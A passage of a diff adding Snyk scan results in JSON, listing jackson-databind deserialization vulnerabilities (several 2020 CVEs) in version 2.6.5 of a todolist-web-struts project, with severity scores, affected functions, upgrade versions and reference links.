+ "modificationTime": "2024-03-06T13:58:57.137266Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:19.998455Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.582959Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `javax.swing.JEditorPane`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2642)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.81534", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10969" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-758m-v56v-grj4" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-26T16:25:31.113677Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-26T14:55:31Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-26T14:55:31Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.582959Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2662", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:51:25.268261Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:53:54.576513Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.826605Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:25.268261Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.576513Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `org.aoju.bus.proxy.provider.remoting.RmiProvider` (aka bus-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2662)\n", + "epssDetails": { + "percentile": "0.81534", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10968" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-rf6r-2c4q-2vwg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-26T17:09:01.709397Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-26T14:55:20Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-26T14:55:20Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.576513Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2670", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-11113", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:18.889961Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:47.400473Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:21.749219Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.889961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.400473Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.openjpa.ee.WASRegistryManagedRuntime` (aka openjpa).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2670)\n- [PoC](https://github.com/Al1ex/CVE-2020-11113)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11113" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-9vvp-fxw6-jcxr" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T08:36:41.369827Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:36Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.400473Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2664", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:44:29.297635Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:14.145935Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.628835Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:44:29.297635Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.145935Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadgets `org.apache.activemq.*` (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2664)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11111" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-v3xw-c963-f5hc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T09:28:18.821103Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:37Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.145935Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676", + "title": "GItHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2666", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:44:29.301384Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:14.113524Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:03.656527Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:44:29.301384Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.113524Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.commons.proxy.provider.remoting.RmiProvider` (aka apache/commons-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GItHub Commit](https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676)\n- [GitHub 